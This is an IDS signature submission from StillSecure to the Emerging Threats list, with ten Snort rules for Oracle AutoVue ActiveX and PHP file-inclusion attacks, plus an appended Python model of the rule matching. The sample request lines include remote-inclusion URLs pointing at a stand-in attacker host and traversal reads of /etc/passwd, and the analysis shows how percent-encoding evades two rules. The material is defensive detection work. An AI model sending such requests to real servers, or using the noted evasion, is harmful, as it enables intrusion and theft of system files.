[Emerging-Sigs] StillSecure: 10 New Signatures - October 28th, 2011

signatures signatures at stillsecure.com
Fri Oct 28 06:25:57 EDT 2011


Hi Matt,

Please find the 10 signatures below:

1. WEB-ATTACKS Oracle AutoVue Activex Insecure method (SaveViewStateToFile)
alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any (msg:"WEB-ATTACKS Oracle AutoVue Activex Insecure method (SaveViewStateToFile)"; flow:to_client,established; content:"<OBJECT "; nocase; content:"classid"; nocase; distance:0; content:"CLSID"; nocase; distance:0; content:"B6FCC215-D303-11D1-BC6C-0000C078797F"; nocase; distance:0; content:".SaveViewStateToFile"; nocase; content:"|2E 2E 2F|"; pcre:"/<OBJECT\s+[^>]*classid\s*=\s*[\x22\x27]?\s*clsid\s*\x3a\s*\x7B?\s*B6FCC215-D303-11D1-BC6C-0000C078797F/si"; classtype:attempted-user; reference:url,exploit-db.com/exploits/18016; sid:2410112; rev:1;)

2. WEB-ATTACKS Oracle AutoVue Activex Insecure method (SaveViewStateToFile) Format String Function Call
alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any (msg:"WEB-ATTACKS Oracle AutoVue Activex Insecure method (SaveViewStateToFile) Format String Function Call"; flow:to_client,established; content:"ActiveXObject"; nocase; content:"AUTOVUEX.AutoVueXCtrl.1"; nocase; distance:0; content:".SaveViewStateToFile"; nocase; content:"|2E 2E 2F|"; reference:url,exploit-db.com/exploits/18016; classtype:attempted-user; sid:2410113; rev:1;)

3. WEB-ATTACKS Oracle AutoVue Activex Insecure method (Export3DBom)
alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any (msg:"WEB-ATTACKS Oracle AutoVue Activex Insecure method (Export3DBom)"; flow:to_client,established; content:"<OBJECT "; nocase; content:"classid"; nocase; distance:0; content:"CLSID"; nocase; distance:0; content:"B6FCC215-D303-11D1-BC6C-0000C078797F"; nocase; distance:0; content:".Export3DBom"; content:"|2E 2E 2F|"; pcre:"/<OBJECT\s+[^>]*classid\s*=\s*[\x22\x27]?\s*clsid\s*\x3a\s*\x7B?\s*B6FCC215-D303-11D1-BC6C-0000C078797F/si"; classtype:attempted-user; reference:url,packetstormsecurity.org/files/106064/9sg_autovueii.tgz; sid:2710111; rev:1;)

4. WEB-ATTACKS Oracle AutoVue Activex Insecure method (Export3DBom) Format String Function Call
alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any (msg:"WEB-ATTACKS Oracle AutoVue Activex Insecure method (Export3DBom) Format String Function Call"; flow:to_client,established; content:"ActiveXObject"; nocase; content:"AUTOVUEX.AutoVueXCtrl.1"; nocase; distance:0; content:".Export3DBom"; content:"|2E 2E 2F|"; classtype:attempted-user; reference:url,packetstormsecurity.org/files/106064/9sg_autovueii.tgz; sid:2710113; rev:1;)

5. WEB-ATTACKS Oracle AutoVue Activex Insecure method (ExportEdaBom)
alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any (msg:"WEB-ATTACKS Oracle AutoVue Activex Insecure method (ExportEdaBom)"; flow:to_client,established; content:"<OBJECT "; nocase; content:"classid"; nocase; distance:0; content:"CLSID"; nocase; distance:0; content:"B6FCC215-D303-11D1-BC6C-0000C078797F"; nocase; distance:0; content:".ExportEdaBom"; content:"|2E 2E 2F|"; pcre:"/<OBJECT\s+[^>]*classid\s*=\s*[\x22\x27]?\s*clsid\s*\x3a\s*\x7B?\s*B6FCC215-D303-11D1-BC6C-0000C078797F/si"; classtype:attempted-user; reference:url,packetstormsecurity.org/files/106065/9sg_autovueiii.tgz; sid:2710112; rev:1;)

6. WEB-ATTACKS Oracle AutoVue Activex Insecure method (ExportEdaBom) Format String Function Call
alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any (msg:"WEB-ATTACKS Oracle AutoVue Activex Insecure method (ExportEdaBom) Format String Function Call"; flow:to_client,established; content:"ActiveXObject"; nocase; content:"AUTOVUEX.AutoVueXCtrl.1"; nocase; distance:0; content:".ExportEdaBom"; content:"|2E 2E 2F|"; classtype:attempted-user; reference:url,packetstormsecurity.org/files/106065/9sg_autovueiii.tgz; sid:2710114; rev:1;)

7. WEB-PHP PHool mainnav Parameter Remote File inclusion Attempt
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"WEB-PHP PHool mainnav Parameter Remote File inclusion Attempt"; flow:established,to_server; content:"GET "; depth:4; uricontent:"/includes/layout/plain.footer.php?"; nocase; uricontent:"mainnav="; nocase; pcre:"/mainnav=\s*(ftps?|https?|php)\:\//Ui"; classtype:web-application-attack; reference:url,packetstormsecurity.org/files/106073/sportsphool-rfi.txt; sid:2410111; rev:1;)

8. WEB-PHP Joomla YJ Contact Local File Inclusion Vulnerability
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"WEB-PHP Joomla YJ Contact Local File Inclusion Vulnerability"; flow:established,to_server; content:"GET "; depth:4; uricontent:"/index.php?"; nocase; uricontent:"option=com_yjcontactus"; uricontent:"view="; nocase; content:"|2e 2e 2f|"; nocase; depth:200; classtype:web-application-attack; reference:url,packetstormsecurity.org/files/106222/joomlayjcontact-lfi.txt; sid:0902112; rev:1;)

9. WEB-PHP Wordpress Easy Stats plugin homep Parameter Remote File inclusion Attempt
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"WEB-PHP Wordpress Easy Stats plugin homep Parameter Remote File inclusion Attempt"; flow:established,to_server; content:"GET "; depth:4; uricontent:"/wp-content/plugins/wpeasystats/export.php?"; nocase; uricontent:"homep="; nocase; pcre:"/homep=\s*(ftps?|https?|php)\:\//Ui"; classtype:web-application-attack; reference:url,secunia.com/advisories/46069; reference:url,spareclockcycles.org/2011/09/18/exploitring-the-wordpress-extension-repos; sid:2510111; rev:1;)

10. WEB-PHP WHMCompleteSolution templatefile Parameter Local File Inclusion Attempt
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"WEB-PHP WHMCompleteSolution templatefile Parameter Local File Inclusion Attempt"; flow:established,to_server; uricontent:"/cart.php?"; nocase; uricontent:"a="; nocase; uricontent:"templatefile="; nocase; content:"|2e 2e 2f|"; nocase; depth:200; classtype:web-application-attack; reference:url,dl.packetstormsecurity.net/1110-exploits/whmcompletesolution-disclose.txt; sid:281020112; rev:1;)

Looking forward to your comments, if any.

Thanks & Regards,
StillSecure
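Added example, not part of the original message or of the StillSecure rules: a small Python model of the matching logic in the four WEB-PHP rules (7 to 10), run over constructed request lines. It approximates two Snort 2.x behaviours that matter for these rules: uricontent and a pcre with the U flag match the normalized (percent-decoded) URI, while a bare content match runs on the raw payload. The practical consequence it shows is that the RFI rules still fire on a percent-encoded scheme, but the LFI rules, which look for "|2e 2e 2f|" with plain content rather than uricontent, do not see an encoded "..%2f". The rule names, helper functions and sample requests are all assumptions made for this example; the percent-decoding stand-in is a simplification of http_inspect.

```python
import re
from urllib.parse import unquote

# Rules 7 and 9 from the post: remote file inclusion on one parameter of one
# script, checked with a pcre that carries the U flag (normalized URI buffer).
RFI_RULES = {
    "PHool mainnav RFI": ("/includes/layout/plain.footer.php?", "mainnav"),
    "Easy Stats homep RFI": ("/wp-content/plugins/wpeasystats/export.php?", "homep"),
}

# Rules 8 and 10 from the post: local file inclusion flagged by a bare
# content:"|2e 2e 2f|" (../) match. The third field records whether the rule
# also requires content:"GET "; depth:4 (rule 8 does, rule 10 does not).
LFI_RULES = {
    "Joomla YJ Contact LFI": ("/index.php?", ("option=com_yjcontactus", "view="), True),
    "WHMCS templatefile LFI": ("/cart.php?", ("a=", "templatefile="), False),
}

# Scheme alternation used by the pcre in rules 7 and 9.
RFI_SCHEME = r"(ftps?|https?|php):/"


def request_uri(request_line: str) -> str:
    """Return the request-target from 'METHOD target HTTP/x.y' (empty if malformed)."""
    parts = request_line.split()
    return parts[1] if len(parts) >= 2 else ""


def normalize_uri(raw_uri: str) -> str:
    """Rough stand-in for http_inspect URI normalization: percent-decoding only (assumption)."""
    return unquote(raw_uri)


def match_rfi(request_line: str) -> list:
    """Names of RFI rules whose conditions the request satisfies."""
    if not request_line.startswith("GET "):          # content:"GET "; depth:4;
        return []
    uri = normalize_uri(request_uri(request_line))
    uri_ci = uri.lower()                             # uricontent ...; nocase;
    hits = []
    for name, (path, param) in RFI_RULES.items():
        if path in uri_ci and param + "=" in uri_ci:
            # pcre:"/<param>=\s*(ftps?|https?|php)\:\//Ui" against the normalized URI
            if re.search(param + r"=\s*" + RFI_SCHEME, uri, re.I):
                hits.append(name)
    return hits


def match_lfi(request_line: str, normalize_content: bool = False) -> list:
    """Names of LFI rules the request triggers.

    normalize_content=False mirrors the posted rules: the ../ check is a bare
    content match on the raw payload, so a percent-encoded ..%2f is not seen.
    normalize_content=True runs the same check on the decoded URI, which is
    what a uricontent:"../" would do.
    """
    uri_raw = request_uri(request_line)
    uri_ci = normalize_uri(uri_raw).lower()
    haystack = normalize_uri(uri_raw) if normalize_content else request_line[:200]
    hits = []
    for name, (path, params, needs_get) in LFI_RULES.items():
        if needs_get and not request_line.startswith("GET "):
            continue
        if path in uri_ci and all(p in uri_ci for p in params) and "../" in haystack:
            hits.append(name)
    return hits


# Constructed sample request lines for this example (not captured traffic).
SAMPLES = {
    "rfi_plain": "GET /includes/layout/plain.footer.php?mainnav=http://attacker.invalid/s.txt? HTTP/1.1",
    "rfi_encoded": "GET /wp-content/plugins/wpeasystats/export.php?homep=http%3A%2F%2Fattacker.invalid%2Fs.txt HTTP/1.1",
    "lfi_plain": "GET /index.php?option=com_yjcontactus&view=../../../../etc/passwd HTTP/1.1",
    "lfi_encoded": "GET /index.php?option=com_yjcontactus&view=..%2f..%2f..%2fetc/passwd HTTP/1.1",
    "lfi_whmcs_post": "POST /cart.php?a=view&templatefile=../../configuration.php HTTP/1.1",
    "benign": "GET /index.php?option=com_yjcontactus&view=default HTTP/1.1",
}

if __name__ == "__main__":
    for label, line in SAMPLES.items():
        print(f"{label:15} rfi={match_rfi(line)} lfi_raw={match_lfi(line)} "
              f"lfi_norm={match_lfi(line, normalize_content=True)}")
```

Running it shows "lfi_encoded" producing no hit under the raw-content check but a hit once the ../ test is moved to the normalized URI, which is the argument for using uricontent (or a pcre with the U flag) for the traversal check in rules 8 and 10, the same way rules 7 and 9 already do for the scheme.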
